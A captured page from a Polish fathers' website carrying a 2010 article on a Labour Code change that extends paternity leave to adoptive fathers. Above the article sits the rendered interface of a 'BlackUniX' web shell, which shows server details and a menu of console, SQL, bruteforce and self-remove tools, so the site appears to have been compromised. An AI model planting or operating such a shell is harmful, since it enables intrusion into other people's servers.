W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:05:34
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Urlop dla ojca adopcyjnego
08.10.2010.
Rada Ministrów przyjęła projekt nowelizacji Kodeksu pracy. Opracowana przez Ministerstwo Pracy i Polityki Społecznej - na wniosek Pełnomocnika Rządu do spraw Równego Traktowania - zmiana daje nowe uprawnienia ojcom, którzy skorzystają z urlopu ojcowskiego także po ukończeniu przez adoptowane dziecko 12. miesiąca życia.

Pełnomocnik Rządu do spraw Równego Traktowania wystąpiła w dniu 5 maja 2010 r. do Minister Pracy i Polityki Społecznej z prośbą o zmianę przepisu art. 1833 ustawy Kodeks pracy w taki sposób, który umożliwi ojcom adopcyjnym skorzystanie z urlopu ojcowskiego po ukończeniu procedury adopcyjnej w okresie po ukończeniu przez dziecko pierwszego roku życia oraz skorzystanie przez ojców z zwiększonego wymiaru urlopu ojcowskiego w sytuacji urodzenia się dzieci z ciąży mnogiej.

W świetle obowiązujących obecnie przepisów Kodeksu pracy prawo do urlopu ojcowskiego przysługuje pracownikowi-ojcu wychowującemu dziecko w okresie pierwszego roku życia dziecka. Zatem możliwość skorzystania przez pracownika-ojca wychowującego dziecko z urlopu ojcowskiego jest uzależniona wyłącznie od wieku dziecka. Urlop ten może być wykorzystany w dowolnym momencie w ciągu pierwszego roku życia dziecka. Uprawnienie to przysługuje każdemu ojcu – biologicznemu i adopcyjnemu. W praktyce jednak wykorzystanie urlopu ojcowskiego przez ojca adopcyjnego może okazać się niemożliwe, gdyż czynności związane z wyjaśnieniem sytuacji prawnej dziecka, pozbawieniem praw rodzicielskich biologicznych rodziców, przeprowadzeniem procedur preadopcyjnych oraz orzeczeniem przysposobienia przez sąd zwykle następują już po ukończeniu przez dziecko pierwszego roku życia.

Minister Pracy i Polityki Społecznej zadeklarowała, iż postulowana przez Pełnomocnika zmiana statusu prawnego polegająca na wydłużeniu urlopu ojcowskiego w przypadku urodzenia się dzieci z ciąży mnogiej zostanie poddana analizie i ocenie co do jej celowości i zasadności.

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.